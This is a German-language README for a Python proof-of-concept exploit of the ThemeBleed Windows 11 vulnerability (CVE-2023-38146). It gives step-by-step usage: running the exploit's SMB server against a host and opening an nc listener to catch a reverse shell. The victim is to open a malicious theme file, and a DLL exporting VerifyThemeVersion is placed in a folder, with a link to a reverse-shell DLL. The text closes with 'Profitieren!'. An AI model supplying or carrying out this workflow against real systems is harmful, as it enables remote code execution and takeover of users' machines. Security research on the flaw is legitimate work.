
PoC für die ThemeBleed Windows 11 CVE-2023-38146, geschrieben in Python mit impacket. https://jnns.de/posts/cve-2023-38146-poc/
Stark inspiriert von https://github.com/gabe-k/themebleed, das nur unter Windows läuft (der Grund, warum ich mich entschieden habe, dies zu schreiben).
Verwendet modifizierten Code von impacket smbserver.py (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)
Nützliches: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs
Blogbeitrag: https://jnns.de/posts/cve-2023-38146-poc/
Installieren Sie die Abhängigkeiten und führen Sie die Anwendung aus:
pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Verwenden Sie die Dateien "evil_theme.theme" oder "evil_theme.themepack" auf einem verwundbaren System.
Profitieren!
Platzieren Sie eine DLL mit einer exportierten Funktion "VerifyThemeVersion" im Ordner "./td/" mit dem Namen "Aero.msstyles_vrf_evil.dll". Sie sollten in der Lage sein, eine Beispiel-DLL über Google zu finden oder mein Beispiel zu verwenden: https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.
pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll
# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711